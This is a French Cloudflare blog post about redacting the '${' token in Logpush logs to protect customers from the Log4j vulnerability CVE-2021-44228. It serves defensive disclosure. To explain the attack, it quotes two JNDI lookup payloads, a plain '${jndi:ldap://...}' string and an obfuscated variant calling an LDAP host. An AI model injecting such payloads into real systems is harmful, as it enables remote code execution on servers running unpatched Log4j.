Abonnez-vous pour recevoir des notifications sur les nouveaux articles :

Assainissement des fichiers journaux Cloudflare pour protéger les clients contre la vulnérabilité Log4j

14/12/2021

2 min. de lecture

Le 9 décembre 2021, le monde a appris l'existence de CVE-2021-44228, une exploitation de vulnérabilité Zero Day affectant l'utilitaire Apache Log4j. Cloudflare a immédiatement mis à jour son pare-feu WAF pour contribuer à établir une protection contre cette vulnérabilité, mais nous recommandons à nos clients de mettre à jour leurs systèmes le plus rapidement possible.

Cependant, nous savons que de nombreux clients de Cloudflare consomment leurs fichiers journaux dans un logiciel qui utilise Log4j. Nous atténuons donc également toute tentative d'exploitation de la vulnérabilité via les fichiers journaux Cloudflare. Au moment de cette publication, nous observons jusqu'à 1000 fois par seconde le modèle d'exploitation de la vulnérabilité dans les fichiers journaux que nous transmettons aux clients.

Dès maintenant, les clients peuvent mettre à jour leurs tâches Logpush afin d'expurger automatiquement les jetons susceptibles de déclencher cette vulnérabilité. Vous pouvez en apprendre davantage à ce sujet dans notre documentation pour développeurs ou consulter les détails ci-dessous.

Comment fonctionne l'attaque

Vous pouvez en apprendre davantage plus sur le fonctionnement de la vulnérabilité de Log4j dans notre publication de blog. En résumé, l'auteur d'une attaque peut ajouter une expression comme ${jndi:ldap://exemple.com/a} dans n'importe quelle chaîne. Log4j établit alors une connexion sur Internet pour récupérer cet objet.

Les fichiers journaux Cloudflare contiennent de nombreux champs de chaînes contrôlés par les utilisateurs finaux sur l'Internet public, comme User Agent et le chemin d'URL. Avec cette vulnérabilité, il est possible qu'un utilisateur malveillant puisse provoquer une exécution de code à distance sur tout système lisant ces champs et utilisant une instance non corrigée de Log4j.

Notre plan d'atténuation

Malheureusement, la simple recherche d'un jeton comme ${jndi:ldap n'est pas suffisante pour offrir une protection contre cette vulnérabilité. En raison de l'expressivité du langage de modélisation, il est nécessaire de rechercher également les variantes masquées. Nous observons déjà des auteurs d'attaques qui utilisent des variantes comme ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}. Ainsi, l'expurgation du jeton ${ est le moyen le plus général de se défendre contre cette vulnérabilité.

Le jeton ${ apparaît jusqu'à 1000 fois par seconde dans les journaux que nous transmettons actuellement aux clients. Une vérification ponctuelle de certains enregistrements montre que beaucoup ne sont pas des tentatives d'exploitation de cette vulnérabilité. Par conséquent, nous ne pouvons pas expurger nos journaux en toute sécurité sans affecter les clients qui s'attendent à voir ce jeton dans leurs journaux.

Dès maintenant, les clients peuvent mettre à jour leurs tâches Logpush pour expurger la chaîne ${ et la remplacer systématiquement par x{.

Pour cela, les clients peuvent mettre à jour la configuration des options de leur tâche Logpush pour inclure le paramètre CVE-2021-44228=true. Pour des instructions détaillées sur la marche à suivre avec l'API Logpush, consultez l'exemple fourni dans notre documentation pour développeurs. Veuillez noter que cette option n'est actuellement pas disponible dans le tableau de bord Cloudflare et qu'elle peut uniquement être modifiée avec l'API.

Nous protégeons des réseaux d'entreprise entiers, aidons nos clients à développer efficacement des applications à l'échelle d'Internet, accélérons tous les sites web ou applications Internet, repoussons les attaques DDoS, tenons les pirates informatiques à distance et pouvons vous accompagner dans votre parcours d'adoption de l'architecture Zero Trust.

Accédez à 1.1.1.1 depuis n'importe quel appareil pour commencer à utiliser notre application gratuite, qui rend votre navigation Internet plus rapide et plus sûre.

Pour en apprendre davantage sur notre mission, à savoir contribuer à bâtir un Internet meilleur, cliquez ici. Si vous cherchez de nouvelles perspectives professionnelles, consultez nos postes vacants.
Logs (FR)FrançaisLog4J (FR)Log4Shell (FR)Cloudflare Zero Trust (FR)Vulnerabilities (FR)Zero Day Threats (FR)Security (FR)

Suivre sur X

Jon Levine|@jplevine
Cloudflare|@cloudflare

Publications associées

08 mars 2024 à 14:05

Log Explorer : surveillez les événements de sécurité sans stockage tiers

Grâce à la puissance combinée des solutions Security Analytics et Log Explorer, les équipes de sécurité peuvent analyser, enquêter et surveiller nativement les attaques au sein du réseau Cloudflare, afin de réduire le délai de résolution et le TCO global en éliminant la nécessité de transmettre les...